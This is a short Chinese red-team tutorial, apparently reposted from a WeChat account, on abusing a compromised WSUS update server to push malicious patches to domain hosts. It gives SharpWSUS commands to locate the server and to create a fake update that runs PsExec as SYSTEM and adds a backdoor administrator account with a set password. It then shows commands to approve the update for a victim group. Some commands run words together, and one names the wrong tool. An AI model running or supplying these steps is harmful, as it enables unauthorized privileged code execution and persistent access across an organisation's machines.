WSUS 是Windows Server 更新服务,为补丁更新服务器,在内网横向的过程中如果获取了该服务器(WSUS) 即可利用该机器进行对主机进行恶意补丁下发。
一、定位WSUS服务器
1、通过注册表查询
regqueryHKLM\Software\Policies\Microsoft\Windows\WindowsUpdate/vwuserver
2、利用sharpwsus定位
SharpWSUS.exelocate
二、下发恶意补丁
注意点WSUS的有效负载必须是Microsoft 签名的二进制文件,所以利用psexec进行利用
SharpWSUS.execreate/payload:"C:\Users\\Public\\psexec64.exe"/args:"-accepteula -s -d cmd.exe /c 'net user test QAZWSX@123 /add && net localgroup administrators test /add'"/title:"demo01"
SharpWSUS.execreate/payload:"C:\Users\eveuser\Desktop\PsExec64.exe"/args:"-accepteula -s -d cmd.exe /c \"whoami\""
补丁生成之后补丁中的二进制文件(psexec.exe)会被保存在设置的WSUS目录”wuagent.exe”
创建组将受害机器添加进入该组,注意补丁下发后并不会立即安装
vncview.exeapprove/updateid:7cfb42e4-d436-4c61-ba04-5837c5818158/computername:evepw-22004961.redteam.com/groupname:"test1"
设置完成之后是可以在wsus控制台当中看到创建的对应补丁
补丁安装时间是根据DC创建的组策略来进行审批更新
到达时间之后WSUS会将补丁推送到指定的受害者机器上,完成利用修改此规则后WSUS批准更新,更新將安裝在电脑上,不會按照組策略的配置。
原文始发于微信公众号(想要暴富的安服仔):WSUS补丁下发利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论